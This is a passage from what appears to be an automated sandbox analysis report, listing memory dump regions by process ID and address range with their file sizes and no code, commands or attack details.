                                                                                                                                                                                                                                                                                                                                          • memory/3760-189-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                                                                                          • memory/3760-197-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                                                                                          • memory/3796-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/3804-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/3804-154-0x0000000002BF0000-0x0000000002D8C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                                                                                          • memory/3904-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4040-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4100-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4108-294-0x0000000005D70000-0x0000000005D71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/4108-306-0x0000000005860000-0x0000000005861000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/4108-267-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/4108-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4112-455-0x0000000076E80000-0x000000007700E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                                                                                          • memory/4112-383-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4112-505-0x0000000006240000-0x0000000006241000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/4152-450-0x0000000005FC0000-0x000000000610A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/4152-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4176-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4176-289-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/4200-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4208-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4256-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4256-293-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                                                                                                          • memory/4256-275-0x0000000000B06000-0x0000000000B17000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            68KB

                                                                                                                                                                                                                                                                                                                                          • memory/4256-305-0x0000000000400000-0x0000000000877000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4.5MB

                                                                                                                                                                                                                                                                                                                                          • memory/4272-260-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4272-469-0x00000000060E0000-0x000000000622A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/4296-418-0x000000001B320000-0x000000001B322000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                          • memory/4296-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4548-354-0x000001F74DC00000-0x000001F74DC72000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                                                                                                          • memory/4548-327-0x00007FF7D6574060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4568-378-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4620-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4620-291-0x000000001C080000-0x000000001C082000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                          • memory/4620-285-0x0000000000290000-0x0000000000291000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/4636-284-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4824-303-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                                                          • memory/4824-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4848-388-0x0000000000418542-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4848-414-0x0000000005230000-0x0000000005836000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                                                          • memory/4856-340-0x0000000000418542-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4856-364-0x0000000005090000-0x0000000005696000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                                                          • memory/4880-369-0x0000000004F60000-0x0000000005566000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                                                          • memory/4880-341-0x0000000000418532-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4900-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4900-411-0x0000000076E80000-0x000000007700E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                                                                                          • memory/4900-452-0x0000000005B00000-0x0000000005B01000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/4916-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4948-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/4948-316-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/5008-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/5008-320-0x00000000042C8000-0x00000000043C9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                                                                                                                                                          • memory/5008-324-0x0000000002AA0000-0x0000000002AFD000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            372KB

                                                                                                                                                                                                                                                                                                                                          • memory/5032-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                          • memory/5032-329-0x000000001B4C0000-0x000000001B4C2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                          • memory/5032-311-0x0000000000810000-0x0000000000811000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/5128-401-0x0000000001430000-0x000000000157A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/5128-396-0x0000000000F70000-0x0000000000F80000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                                                                                                                          • memory/5204-487-0x0000000004D50000-0x0000000004D51000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/5368-439-0x00000000024D0000-0x00000000024D2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                          • memory/5452-435-0x000000001C630000-0x000000001C632000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                          • memory/5872-490-0x0000000004D60000-0x0000000004D61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/5916-461-0x0000000002F90000-0x0000000002F92000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                          • memory/5984-539-0x0000000005670000-0x0000000005671000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/6132-520-0x0000000076E80000-0x000000007700E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.6MB